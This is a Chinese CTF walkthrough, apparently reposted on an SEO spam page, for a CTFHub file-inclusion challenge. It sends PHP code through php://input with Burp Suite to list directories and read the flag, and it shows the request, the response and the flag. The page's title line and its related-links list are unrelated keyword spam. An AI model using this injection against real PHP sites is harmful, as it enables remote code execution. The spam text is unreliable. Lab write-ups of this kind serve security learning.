当前位置: 首页 > news >正文

苏州做网站的网络公司诈骗高端网站建设南宁

苏州做网站的网络公司诈骗,高端网站建设南宁,常州网站建设策划,网站后台能进前台空白我们需要使用php://input来构造发送的指令 查看phpinfo&#xff0c;找到一下字段 证明是可以使用php://input 1. 使用Burpsuite抓包并转至Repeater 2. 构造包 方法&#xff1a;POST 目标&#xff1a;/?filephp://input Body&#xff1a;<?php system("ls /"…

我们需要使用php://input来构造发送的指令
查看phpinfo,找到一下字段
在这里插入图片描述
证明是可以使用php://input

1.   使用Burpsuite抓包并转至Repeater

2. 构造包

方法:POST
目标:/?file=php://input
Body:<?php system("ls /"); ?>

响应:

HTTP/1.1 200 OK
Server: openresty/1.21.4.2
Date: Mon, 13 Nov 2023 08:59:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 178
Connection: close
X-Powered-By: PHP/5.6.40
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Methods: *

bin
boot
dev
etc
flag_13803
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

<hr>
i don't have shell, how to get flag? <br>
<a href="phpinfo.php">phpinfo</a>

3. 使用cat访问flag_xxx
<?php system("cat /flag_13803")?>

flag: 
ctfhub{3dca56f1cd6b532d39ac2bde}

http://www.15wanjia.com/news/37403.html

相关文章:

  • 莆田网站建设培训百度推销广告一年多少钱
  • 网站的内部链接如何做网站互联网推广
  • 海洋公司做网站推广营销页面设计
  • 柳州建设网站百度今日小说排行榜
  • 中小型网站设计哪家好三只松鼠营销策划书
  • 网站建设服务定制万能引流软件
  • 做网购的有哪几个网站做网络推广的团队
  • 长沙做网站seo公司seo搜索引擎优化推广专员
  • 政府门户网站建设自查报告黑帽seo优化软件
  • 周村网站制作价格低刷推广链接
  • 哈尔滨百度推广电话软文优化
  • 公安网网站建设免费培训seo网站
  • 中国石化工程建设公司网站巨量广告投放平台
  • php做的网站怎么运行郑州百度搜索优化
  • 做京东网站需要哪些手续费浏览器大全
  • 公众号会员卡管理系统深圳高端seo外包公司
  • 智慧团建登录平台入口网页优化方法
  • 网站群建设技术规范百度做广告怎么做
  • 自己网站做问卷调查100种宣传方式
  • 网站建设与网络推广百度新闻首页头条
  • 正规网站建设搜索引擎的设计与实现
  • 企业网站建站源码电商详情页模板免费下载
  • wordpress 备份还原百度seo最成功的优化
  • 成都网站建设四川推来客网络win7优化大师官网
  • 哪个网站学习做辅助腾讯会议多少钱一个月
  • 自助建站是什么意思aso优化报价
  • 新疆住房和建设厅网站首页媒体发稿公司
  • 可以做短信炸弹的网站自媒体营销的策略和方法
  • 做足球网站前景百度关键词seo外包
  • 找网站建设公司哪家最好域名查询官网